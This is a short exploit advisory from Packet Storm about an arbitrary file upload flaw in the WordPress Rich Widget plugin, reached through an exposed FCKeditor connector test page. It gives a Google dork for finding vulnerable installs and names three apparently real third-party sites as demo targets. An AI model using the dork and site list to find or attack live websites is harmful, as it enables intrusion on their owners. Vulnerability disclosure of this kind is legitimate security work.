WordPress Rich Widget third party plugin suffers from an arbitrary file upload vulnerability.
38935038ab3d5c40c39b162fc8ad9477c1346f6d1276d6494ee3bb8f7896074e_________ .__ __________________ \_ ___ \_______|__| _____
\_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____|
| \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_
/ \/ \/ \/ \/
# Exploit Title: Wordpress Rich Widget Arbitrary File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/rich-widget
# Date: 08/22/2012
# Author: Crim3R
# download Link : http://downloads.wordpress.org/plugin/rich-widget.0.2.4.zip
# Tested on: all
==================================
D3m0:
http://robinveilleux.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html
http://www.ctexpos.com/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html
http://www.krystalclear.ca/wp-content/plugins/rich-widget/fckeditor/editor/filemanager/connectors/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed